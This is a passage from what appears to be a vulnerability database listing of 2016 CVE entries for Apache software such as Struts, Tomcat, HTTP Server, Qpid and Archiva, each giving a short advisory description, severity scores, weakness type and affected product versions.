canonical ubuntu_linux 15.10
redhat enterprise_linux_eus 7.6
canonical ubuntu_linux 12.04
redhat enterprise_linux_eus 7.4
oracle jre 1.6.0
netapp e-series_santricity_storage_manager -
oracle linux 7
netapp oncommand_insight -
canonical ubuntu_linux 14.04
oracle linux 5
opensuse opensuse 13.1
redhat enterprise_linux_desktop 7.0
suse linux_enterprise_software_development_kit 12
redhat enterprise_linux_server_aus 7.6
redhat enterprise_linux_workstation 7.0
redhat enterprise_linux_server_aus 7.3
redhat enterprise_linux_eus 7.7
netapp storagegrid *
suse linux_enterprise_server 11
oracle jdk 1.8.0
redhat satellite 5.7
netapp oncommand_report -
netapp e-series_santricity_web_services -
netapp oncommand_shift -
suse linux_enterprise_software_development_kit 11
suse linux_enterprise_desktop 12
netapp oncommand_cloud_manager -
suse linux_enterprise_module_for_legacy 12
redhat enterprise_linux_server_eus 7.2
suse manager_proxy 2.1
oracle jdk 1.7.0
redhat enterprise_linux_server_aus 7.7
redhat enterprise_linux_workstation 5.0
suse openstack_cloud 5
oracle jrockit r28.3.9
redhat satellite 5.6
redhat enterprise_linux_server 5.0
oracle jdk 1.6.0
netapp oncommand_workflow_automation -
CVE-2016-4003 MEDIUM

Cross-site scripting (XSS) vulnerability in the URLDecoder function in JRE before 1.8, as used in Apache Struts 2.x before 2.3.28, when using a single-byte page encoding, allows remote attackers to inject arbitrary web script or HTML via multi-byte characters in a URL-encoded parameter.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache struts *
CVE-2016-4430 MEDIUM

Apache Struts 2 2.3.20 through 2.3.28.1 mishandles token validation, which allows remote attackers to conduct cross-site request forgery (CSRF) attacks via unspecified vectors.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-352,

Products Affected

Vendor Product Version
apache struts 2.3.20
apache struts 2.3.28
apache struts 2.3.20.3
apache struts 2.3.28.1
apache struts 2.3.24.1
apache struts 2.3.20.1
apache struts 2.3.24
apache struts 2.3.24.3
CVE-2016-4431 MEDIUM

Apache Struts 2 2.3.20 through 2.3.28.1 allows remote attackers to bypass intended access restrictions and conduct redirection attacks by leveraging a default method.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache struts 2.3.20
apache struts 2.3.28
apache struts 2.3.20.3
apache struts 2.3.24.1
apache struts 2.3.20.1
apache struts 2.3.24
apache struts 2.3.24.3
CVE-2016-4432 MEDIUM

The AMQP 0-8, 0-9, 0-91, and 0-10 connection handling in Apache Qpid Java before 6.0.3 might allow remote attackers to bypass authentication and consequently perform actions via vectors related to connection state logging.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache qpid_broker-j *
CVE-2016-4433 MEDIUM

Apache Struts 2 2.3.20 through 2.3.28.1 allows remote attackers to bypass intended access restrictions and conduct redirection attacks via a crafted request.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache struts 2.3.20
apache struts 2.3.28
apache struts 2.3.20.3
apache struts 2.3.24.1
apache struts 2.3.20.1
apache struts 2.3.24
apache struts 2.3.24.3
CVE-2016-4434 MEDIUM

Apache Tika before 1.13 does not properly initialize the XML parser or choose handlers, which might allow remote attackers to conduct XML External Entity (XXE) attacks via vectors involving (1) spreadsheets in OOXML files and (2) XMP metadata in PDF and other file formats, a related issue to CVE-2016-2175.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache tika 1.12
CVE-2016-4436 HIGH

Apache Struts 2 before 2.3.29 and 2.5.x before 2.5.1 allow attackers to have unspecified impact via vectors related to improper action name clean up.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache struts 2.0.2
apache struts 2.3.20
apache struts 2.0.9
apache struts 2.3.14.1
apache struts 2.3.16.2
apache struts 2.3.24.3
apache struts 2.2.3.1
apache struts 2.2.1.1
apache struts 2.3.28.1
apache struts 2.2.1
apache struts 2.0.11.2
apache struts 2.0.11.1
apache struts 2.0.3
apache struts 2.3.15.2
apache struts 2.1.8
apache struts 2.3.16.1
apache struts 2.0.12
apache struts 2.3.16.3
apache struts 2.3.20.3
apache struts 2.0.14
apache struts 2.0.0
apache struts 2.3.15.1
apache struts 2.5
apache struts 2.3.4.1
apache struts 2.3.3
apache struts 2.0.6
apache struts 2.0.11
apache struts 2.3.20.1
apache struts 2.3.24
apache struts 2.3.1.1
apache struts 2.0.7
apache struts 2.3.14.2
apache struts 2.3.7
apache struts 2.0.8
apache struts 2.3.4
apache struts 2.0.1
apache struts 2.3.14.3
apache struts 2.3.15.3
apache struts 2.3.1
apache struts 2.0.5
apache struts 2.3.12
apache struts 2.1.6
apache struts 2.3.8
apache struts 2.1.8.1
apache struts 2.0.4
apache struts 2.3.15
apache struts 2.3.28
apache struts 2.3.14
apache struts 2.3.1.2
apache struts 2.3.24.1
apache struts 2.2.3
apache struts 2.3.16
CVE-2016-4437 MEDIUM

Apache Shiro before 1.2.5, when a cipher key has not been configured for the "remember me" feature, allows remote attackers to execute arbitrary code or bypass intended access restrictions via an unspecified request parameter.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,CWE-321,

Products Affected

Vendor Product Version
redhat fuse 1.0
redhat jboss_middleware_text-only_advisories 1.0
apache shiro *
apache aurora *
CVE-2016-4438 HIGH

The REST plugin in Apache Struts 2 2.3.19 through 2.3.28.1 allows remote attackers to execute arbitrary code via a crafted expression.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache struts 2.3.20
apache struts 2.3.28
apache struts 2.3.20.3
apache struts 2.3.24.1
apache struts 2.3.20.1
apache struts 2.3.24
apache struts 2.3.24.3
CVE-2016-4460 HIGH

Apache Pony Mail 0.6c through 0.8b allows remote attackers to bypass authentication.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache pony_mail 0.7b
apache pony_mail 0.6c
apache pony_mail 0.8b
CVE-2016-4461 HIGH

Apache Struts 2.x before 2.3.29 allows remote attackers to execute arbitrary code via a "%{}" sequence in a tag attribute, aka forced double OGNL evaluation. NOTE: this vulnerability exists because of an incomplete fix for CVE-2016-0785.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache struts *
netapp oncommand_balance -
CVE-2016-4462 MEDIUM

By manipulating the URL parameter externalLoginKey, a malicious, logged-in user could pass valid Freemarker directives to the Template Engine that are reflected on the web page; a specially crafted Freemarker template could be used for remote code execution. Mitigation: Upgrade to Apache OFBiz 16.11.01.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache ofbiz 13.07
apache ofbiz 13.07.02
apache ofbiz 11.04.05
apache ofbiz 11.04.01
apache ofbiz 11.04.06
apache ofbiz 12.04.01
apache ofbiz 12.04.05
apache ofbiz 12.04
apache ofbiz 11.04.03
apache ofbiz 13.07.03
apache ofbiz 11.04
apache ofbiz 12.04.04
apache ofbiz 11.04.04
apache ofbiz 12.04.03
apache ofbiz 12.04.06
apache ofbiz 12.04.02
apache ofbiz 11.04.02
apache ofbiz 13.07.01
CVE-2016-4463 MEDIUM

Stack-based buffer overflow in Apache Xerces-C++ before 3.1.4 allows context-dependent attackers to cause a denial of service via a deeply nested DTD.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-119,

Products Affected

Vendor Product Version
apache xerces-c++ *
debian debian_linux 8.0
CVE-2016-4464 HIGH

The application plugins in Apache CXF Fediz 1.2.x before 1.2.3 and 1.3.x before 1.3.1 do not match SAML AudienceRestriction values against configured audience URIs, which might allow remote attackers to bypass intended restrictions and have unspecified other impact via a crafted SAML token with a trusted signature.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-284,

Products Affected

Vendor Product Version
apache cxf_fediz 1.2.0
apache cxf_fediz 1.2.2
apache cxf_fediz 1.3.0
apache cxf_fediz 1.2.1
CVE-2016-4465 MEDIUM

The URLValidator class in Apache Struts 2 2.3.20 through 2.3.28.1 and 2.5.x before 2.5.1 allows remote attackers to cause a denial of service via a null value for a URL field.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache struts 2.5
apache struts 2.3.20
apache struts 2.3.28
apache struts 2.3.20.3
apache struts 2.3.28.1
apache struts 2.3.24.1
apache struts 2.3.20.1
apache struts 2.3.24
apache struts 2.3.24.3
CVE-2016-4467 MEDIUM

The C client and C-based client bindings in the Apache Qpid Proton library before 0.13.1 on Windows do not properly verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate when using the SChannel-based security layer, which allows man-in-the-middle attackers to spoof servers via an arbitrary valid certificate.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-295,

Products Affected

Vendor Product Version
apache qpid_proton 0.12.2
apache qpid_proton 0.10.0
apache qpid_proton 0.9.0
apache qpid_proton 0.8.0
apache qpid_proton 0.9.1
apache qpid_proton 0.11.1
apache qpid_proton 0.12.0
apache qpid_proton 0.13.0
apache qpid_proton 0.11.0
apache qpid_proton 0.12.1
CVE-2016-4469 MEDIUM

Multiple cross-site request forgery (CSRF) vulnerabilities in Apache Archiva 1.3.9 and earlier allow remote attackers to hijack the authentication of administrators for requests that (1) add new repository proxy connectors via the token parameter to admin/addProxyConnector_commit.action, (2) new repositories via the token parameter to admin/addRepository_commit.action, (3) edit existing repositories via the token parameter to admin/editRepository_commit.action, (4) add legacy artifact paths via the token parameter to admin/addLegacyArtifactPath_commit.action, (5) change the organizational appearance via the token parameter to admin/saveAppearance.action, or (6) upload new artifacts via the token parameter to upload_submit.action.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-352,

Products Affected

Vendor Product Version
apache archiva *
CVE-2016-4970 HIGH

handler/ssl/OpenSslEngine.java in Netty 4.0.x before 4.0.37.Final and 4.1.x before 4.1.1.Final allows remote attackers to cause a denial of service (infinite loop).

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: HIGH

Problem Type: CWE-835,

Products Affected

Vendor Product Version
redhat jboss_middleware_text-only_advisories 1.0
redhat jboss_data_grid 7.1
netty netty *
apache cassandra 3.11.4
CVE-2016-4974 MEDIUM

Apache Qpid AMQP 0-x JMS client before 6.0.4 and JMS (AMQP 1.0) before 0.10.0 does not restrict the use of classes available on the classpath, which might allow remote authenticated users with permission to send messages to deserialize arbitrary objects and execute arbitrary code by leveraging a crafted serialized object in a JMS ObjectMessage that is handled by the getObject function.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache jms_client_amqp *
apache amqp_0-x_jms_client *
CVE-2016-4975 MEDIUM

Possible CRLF injection allowing HTTP response splitting attacks for sites which use mod_userdir. This issue was mitigated by changes made in 2.4.25 and 2.2.32 which prohibit CR or LF injection into the "Location" or other outbound header key or value. Fixed in Apache HTTP Server 2.4.25 (Affected 2.4.1-2.4.23). Fixed in Apache HTTP Server 2.2.32 (Affected 2.2.0-2.2.31).

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-93,

Products Affected

Vendor Product Version
apache http_server 2.2.10
apache http_server 2.4.7
apache http_server 2.2.17
apache http_server 2.2.27
apache http_server 2.2.31
apache http_server 2.4.2
apache http_server 2.2.19
apache http_server 2.2.4
apache http_server 2.2.11
apache http_server 2.4.18
apache http_server 2.2.2
apache http_server 2.4.3
apache http_server 2.4.10
apache http_server 2.4.1
apache http_server 2.2.9
apache http_server 2.2.14
apache http_server 2.4.17
apache http_server 2.2.20
apache http_server 2.2.0
apache http_server 2.2.16
apache http_server 2.2.25
apache http_server 2.2.26
apache http_server 2.2.12
apache http_server 2.2.29
apache http_server 2.2.6
apache http_server 2.2.23
apache http_server 2.2.13
apache http_server 2.2.18
apache http_server 2.4.23
apache http_server 2.4.6
apache http_server 2.2.8
apache http_server 2.4.20
apache http_server 2.4.12
apache http_server 2.4.4
apache http_server 2.4.16
apache http_server 2.2.15
apache http_server 2.2.21
apache http_server 2.4.9
apache http_server 2.2.22
apache http_server 2.2.3
apache http_server 2.2.24
CVE-2016-4976 LOW

Apache Ambari 2.x before 2.4.0 includes KDC administrator passwords on the kadmin command line, which allows local users to obtain sensitive information via a process listing.

CVSS 2.0

Severity: LOW

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache ambari 2.0.1
apache ambari 2.2.0
apache ambari 2.2.2
apache ambari 2.0.2
apache ambari 2.2.1
apache ambari 2.0.0
apache ambari 2.1.0
apache ambari 2.1.1
apache ambari 2.1.2
CVE-2016-4978 MEDIUM

The getObject method of the javax.jms.ObjectMessage class in the (1) JMS Core client, (2) Artemis broker, and (3) Artemis REST component in Apache ActiveMQ Artemis before 1.4.0 might allow remote authenticated users with permission to send messages to the Artemis broker to deserialize arbitrary objects and execute arbitrary code by leveraging gadget classes being present on the Artemis classpath.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.2 HIGH CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H 1.2 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-502,

Products Affected

Vendor Product Version
redhat jboss_enterprise_application_platform 7.0.0
redhat jboss_enterprise_application_platform 6.0.0
apache activemq_artemis *
redhat jboss_enterprise_application_platform 6.4.0
redhat jboss_enterprise_application_platform 7.1.0
CVE-2016-4979 MEDIUM

The Apache HTTP Server 2.4.18 through 2.4.20, when mod_http2 and mod_ssl are enabled, does not properly recognize the "SSLVerifyClient require" directive for HTTP/2 request authorization, which allows remote attackers to bypass intended access restrictions by leveraging the ability to send multiple requests over a single connection and aborting a renegotiation.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-284,

Products Affected

Vendor Product Version
apache http_server 2.4.19
apache http_server 2.4.20
apache http_server 2.4.18
CVE-2016-5000 MEDIUM

The XLSX2CSV example in Apache POI before 3.14 allows remote attackers to read arbitrary files via a crafted OpenXML document containing an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache poi *
CVE-2016-5001 LOW

This is an information disclosure vulnerability in Apache Hadoop before 2.6.4 and 2.7.x before 2.7.2 in the short-circuit reads feature of HDFS. A local user on an HDFS DataNode may be able to craft a block token that grants unauthorized read access to random files by guessing certain fields in the token.

CVSS 2.0

Severity: LOW

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache hadoop 2.7.1
apache hadoop 2.7.0
apache hadoop *
CVE-2016-5002 HIGH

XML external entity (XXE) vulnerability in the Apache XML-RPC (aka ws-xmlrpc) library 3.1.3, as used in Apache Archiva, allows remote attackers to conduct server-side request forgery (SSRF) attacks via a crafted DTD.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache xml-rpc 3.1.3
CVE-2016-5003 HIGH

The Apache XML-RPC (aka ws-xmlrpc) library 3.1.3, as used in Apache Archiva, allows remote attackers to execute arbitrary code via a crafted serialized Java object in an <ex:serializable> element.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache ws-xmlrpc 3.1.3
CVE-2016-5004 MEDIUM

The Content-Encoding HTTP header feature in ws-xmlrpc 3.1.3 as used in Apache Archiva allows remote attackers to cause a denial of service (resource consumption) by decompressing a large file containing zeroes.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-400,

Products Affected

Vendor Product Version
apache ws-xmlrpc 3.1.3
CVE-2016-5005 LOW

Cross-site scripting (XSS) vulnerability in Apache Archiva 1.3.9 and earlier allows remote authenticated administrators to inject arbitrary web script or HTML via the connector.sourceRepoId parameter to admin/addProxyConnector_commit.action.

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache archiva *
CVE-2016-5017 MEDIUM

Buffer overflow in the C cli shell in Apache Zookeeper before 3.4.9 and 3.5.x before 3.5.3, when using the "cmd:" batch mode syntax, allows attackers to have unspecified impact via a long command string.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-119,

Products Affected

Vendor Product Version
apache zookeeper 3.5.1
apache zookeeper 3.5.0
apache zookeeper *
apache zookeeper 3.5.2
CVE-2016-5018 MEDIUM

In Apache Tomcat 9.0.0.M1 to 9.0.0.M9, 8.5.0 to 8.5.4, 8.0.0.RC1 to 8.0.36, 7.0.0 to 7.0.70 and 6.0.0 to 6.0.45 a malicious web application was able to bypass a configured SecurityManager via a Tomcat utility method that was accessible to web applications.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N 3.9 5.2

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
netapp snap_creator_framework -
redhat enterprise_linux_eus 7.7
redhat enterprise_linux_server_aus 7.4
redhat enterprise_linux_server_tus 7.6
netapp oncommand_shift -
redhat enterprise_linux_eus 7.5
redhat jboss_enterprise_application_platform 6.4
redhat enterprise_linux_eus 7.6
debian debian_linux 8.0
apache tomcat *
redhat enterprise_linux_eus 7.4
redhat enterprise_linux_server_aus 7.7
canonical ubuntu_linux 16.04
redhat enterprise_linux_server_tus 7.7
netapp oncommand_insight -
apache tomcat 9.0.0
oracle tekelec_platform_distribution *
redhat jboss_enterprise_web_server 3.0.0
redhat enterprise_linux_desktop 7.0
redhat enterprise_linux_server_aus 7.6
redhat enterprise_linux_workstation 7.0
redhat enterprise_linux_server 7.0
CVE-2016-5019 HIGH

CoreResponseStateManager in Apache MyFaces Trinidad 1.0.0 through 1.0.13, 1.2.x before 1.2.15, 2.0.x before 2.0.2, and 2.1.x before 2.1.2 might allow attackers to conduct deserialization attacks via a crafted serialized view state string.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache myfaces_trinidad *
CVE-2016-5387 MEDIUM

The Apache HTTP Server through 2.4.23 follows RFC 3875 section 4.1.18 and therefore does not protect applications from the presence of untrusted client data in the HTTP_PROXY environment variable, which might allow remote attackers to redirect an application's outbound HTTP traffic to an arbitrary proxy server via a crafted Proxy header in an HTTP request, aka an "httpoxy" issue. NOTE: the vendor states "This mitigation has been assigned the identifier CVE-2016-5387"; in other words, this is not a CVE ID for a vulnerability.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.1 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H 2.2 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
redhat enterprise_linux_server_aus 7.2
apache http_server *
redhat jboss_web_server 2.1.0
redhat enterprise_linux_server_aus 7.4
redhat enterprise_linux_server_tus 7.3
opensuse leap 42.1
hp system_management_homepage *
redhat enterprise_linux_server_tus 7.6
fedoraproject fedora 24
redhat jboss_core_services 1.0
canonical ubuntu_linux 15.10
redhat enterprise_linux_eus 7.6
canonical ubuntu_linux 12.04
redhat enterprise_linux_eus 7.4
oracle linux 7
redhat enterprise_linux_server 6.0
canonical ubuntu_linux 14.04
oracle linux 5
oracle communications_user_data_repository *
redhat jboss_enterprise_web_server 3.0.0
redhat enterprise_linux_desktop 7.0
oracle enterprise_manager_ops_center 12.3.2
redhat enterprise_linux_server_aus 7.6
redhat enterprise_linux_workstation 7.0
redhat enterprise_linux_eus 7.2
redhat enterprise_linux_server_aus 7.3
redhat enterprise_linux_eus 7.7
oracle linux 6
oracle enterprise_manager_ops_center 12.2.2
fedoraproject fedora 23
opensuse opensuse 13.2
redhat enterprise_linux_eus 7.3
redhat enterprise_linux_eus 7.5
redhat enterprise_linux_desktop 6.0
debian debian_linux 8.0
redhat enterprise_linux_server_aus 7.7
canonical ubuntu_linux 16.04
redhat enterprise_linux_server_tus 7.7
redhat enterprise_linux_server_tus 7.2
redhat enterprise_linux_workstation 6.0
redhat jboss_enterprise_web_server 2.0.0
oracle solaris 11.3
redhat enterprise_linux_server 7.0
CVE-2016-5388 MEDIUM

Apache Tomcat 7.x through 7.0.70 and 8.x through 8.5.4, when the CGI Servlet is enabled, follows RFC 3875 section 4.1.18 and therefore does not protect applications from the presence of untrusted client data in the HTTP_PROXY environment variable, which might allow remote attackers to redirect an application's outbound HTTP traffic to an arbitrary proxy server via a crafted Proxy header in an HTTP request, aka an "httpoxy" issue. NOTE: the vendor states "A mitigation is planned for future releases of Tomcat, tracked as CVE-2016-5388"; in other words, this is not a CVE ID for a vulnerability.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-284,

Products Affected

Vendor Product Version
redhat enterprise_linux_server_aus 7.2
oracle linux 6
hp system_management_homepage *
redhat enterprise_linux_hpc_node 7.0
redhat enterprise_linux_desktop 6.0
apache tomcat *
redhat enterprise_linux_server_eus 7.2
oracle linux 7
redhat enterprise_linux_server_tus 7.2
redhat enterprise_linux_server 6.0
redhat enterprise_linux_workstation 6.0
redhat enterprise_linux_hpc_node_eus 7.2
redhat enterprise_linux_desktop 7.0
redhat enterprise_linux_hpc_node 6.0
redhat enterprise_linux_workstation 7.0
redhat enterprise_linux_server 7.0
CVE-2016-5393 MEDIUM

In Apache Hadoop 2.6.x before 2.6.5 and 2.7.x before 2.7.3, a remote user who can authenticate with the HDFS NameNode can possibly run arbitrary commands with the same privileges as the HDFS service.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-284,

Products Affected

Vendor Product Version
apache hadoop 2.6.2
apache hadoop 2.6.4
apache hadoop 2.7.1
apache hadoop 2.7.0
apache hadoop 2.6.0
apache hadoop 2.6.3
apache hadoop 2.7.2
apache hadoop 2.6.1
CVE-2016-5394 MEDIUM

In the XSS Protection API module before 1.0.12 in Apache Sling, the encoding done by the XSSAPI.encodeForJSString() method is not restrictive enough and for some input patterns allows script tags to pass through unencoded, leading to potential XSS vulnerabilities.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache sling *
CVE-2016-5395 LOW

Cross-site scripting (XSS) vulnerability in the create user functionality in the policy admin tool in Apache Ranger before 0.6.1 allows remote authenticated administrators to inject arbitrary web script or HTML via vectors related to policies.

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache ranger 0.5.1
apache ranger 0.5.3
apache ranger 0.5.2
apache ranger *
apache ranger 0.6.0
CVE-2016-5396 HIGH

Apache Traffic Server 6.0.0 to 6.2.0 is affected by an HPACK Bomb Attack.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-399,

Products Affected

Vendor Product Version
apache traffic_server 6.2.0
apache traffic_server 6.1.0
apache traffic_server 6.1.1
apache traffic_server 6.0.0
CVE-2016-5397 HIGH

The Apache Thrift Go client library exposed the potential during code generation for command injection due to using an external formatting tool. Affected Apache Thrift 0.9.3 and older. Fixed in Apache Thrift 0.10.0.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-77,

Products Affected

Vendor Product Version
apache thrift *
CVE-2016-5425 HIGH

The Tomcat package on Red Hat Enterprise Linux (RHEL) 7, Fedora, CentOS, Oracle Linux, and possibly other Linux distributions uses weak permissions for /usr/lib/tmpfiles.d/tomcat.conf, which allows local users to gain root privileges by leveraging membership in the tomcat group.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 1.8 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-276,

Products Affected

Vendor Product Version
apache tomcat -
CVE-2016-6325 HIGH

The Tomcat package on Red Hat Enterprise Linux (RHEL) 5 through 7, JBoss Web Server 3.0, and JBoss EWS 2 uses weak permissions for (1) /etc/sysconfig/tomcat and (2) /etc/tomcat/tomcat.conf, which allows local users to gain privileges by leveraging membership in the tomcat group.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache tomcat -
CVE-2016-6497 MEDIUM

main/java/org/apache/directory/groovyldap/LDAP.java in the Groovy LDAP API in Apache allows attackers to conduct LDAP entry poisoning attacks by leveraging setting returnObjFlag to true for all search methods.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-254,

Products Affected

Vendor Product Version
apache groovy_ldap *
CVE-2016-6793 MEDIUM

The DiskFileItem class in Apache Wicket 6.x before 6.25.0 and 1.5.x before 1.5.17 allows remote attackers to cause a denial of service (infinite loop) and write to, move, and delete files with the permissions of DiskFileItem, and if running on a Java VM before 1.3.1, execute arbitrary code via a crafted serialized Java object.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache wicket *
CVE-2016-6794 MEDIUM

When a SecurityManager is configured, a web application's ability to read system properties should be controlled by the SecurityManager. In Apache Tomcat 9.0.0.M1 to 9.0.0.M9, 8.5.0 to 8.5.4, 8.0.0.RC1 to 8.0.36, 7.0.0 to 7.0.70, 6.0.0 to 6.0.45 the system property replacement feature for configuration files could be used by a malicious web application to bypass the SecurityManager and read system properties that should not be visible.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
netapp snap_creator_framework -
redhat enterprise_linux_eus 7.7
redhat enterprise_linux_server_tus 7.6
netapp oncommand_shift -
redhat enterprise_linux_eus 7.5
redhat enterprise_linux_eus 7.6
debian debian_linux 8.0
apache tomcat *
redhat enterprise_linux_eus 7.4
redhat enterprise_linux_server_aus 7.7
canonical ubuntu_linux 16.04
redhat enterprise_linux_server_tus 7.7
netapp oncommand_insight -
apache tomcat 9.0.0
oracle tekelec_platform_distribution *
redhat jboss_enterprise_web_server 3.0.0
redhat enterprise_linux_desktop 7.0
redhat enterprise_linux_server_aus 7.6
redhat enterprise_linux_workstation 7.0
redhat enterprise_linux_server 7.0
CVE-2016-6795 HIGH

In the Convention plugin in Apache Struts 2.3.x before 2.3.31, and 2.5.x before 2.5.5, it is possible to prepare a special URL which will be used for path traversal and execution of arbitrary code on server side.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache struts 2.3.20
apache struts 2.3.22
apache struts 2.3.26
apache struts 2.3.20.1
apache struts 2.3.24
apache struts 2.3.24.3
apache struts 2.3.29
apache struts 2.3.28
apache struts 2.3.20.3
apache struts 2.3.27
apache struts 2.3.28.1
apache struts 2.3.24.2
apache struts 2.3.24.1
apache struts 2.3.30
apache struts 2.3.21
apache struts 2.3.25
apache struts 2.3.20.2
apache struts 2.3.23
CVE-2016-6796 MEDIUM

A malicious web application running on Apache Tomcat 9.0.0.M1 to 9.0.0.M9, 8.5.0 to 8.5.4, 8.0.0.RC1 to 8.0.36, 7.0.0 to 7.0.70 and 6.0.0 to 6.0.45 was able to bypass a configured SecurityManager via manipulation of the configuration parameters for the JSP Servlet.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
netapp snap_creator_framework -
redhat enterprise_linux_eus 7.7
redhat enterprise_linux_server_aus 7.4
redhat enterprise_linux_server_tus 7.6
netapp oncommand_shift -
redhat enterprise_linux_eus 7.5
redhat jboss_enterprise_application_platform 6.4
oracle tekelec_platform_distribution 7.4.0
redhat enterprise_linux_eus 7.6
debian debian_linux 8.0
apache tomcat *
redhat enterprise_linux_eus 7.4
redhat enterprise_linux_server_aus 7.7
canonical ubuntu_linux 16.04
redhat enterprise_linux_server_tus 7.7
netapp oncommand_insight -
apache tomcat 9.0.0
oracle tekelec_platform_distribution 7.7.1
redhat jboss_enterprise_web_server 3.0.0
redhat enterprise_linux_desktop 7.0
redhat enterprise_linux_server_aus 7.6
redhat enterprise_linux_workstation 7.0
redhat enterprise_linux_server 7.0
CVE-2016-6797 MEDIUM

The ResourceLinkFactory implementation in Apache Tomcat 9.0.0.M1 to 9.0.0.M9, 8.5.0 to 8.5.4, 8.0.0.RC1 to 8.0.36, 7.0.0 to 7.0.70 and 6.0.0 to 6.0.45 did not limit web application access to global JNDI resources to those resources explicitly linked to the web application. Therefore, it was possible for a web application to access any global JNDI resource whether an explicit ResourceLink had been configured or not.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-863,

Products Affected

Vendor Product Version
netapp snap_creator_framework -
redhat enterprise_linux_eus 7.7
redhat enterprise_linux_server_aus 7.4
redhat enterprise_linux_server_tus 7.6
netapp oncommand_shift -
redhat enterprise_linux_eus 7.5
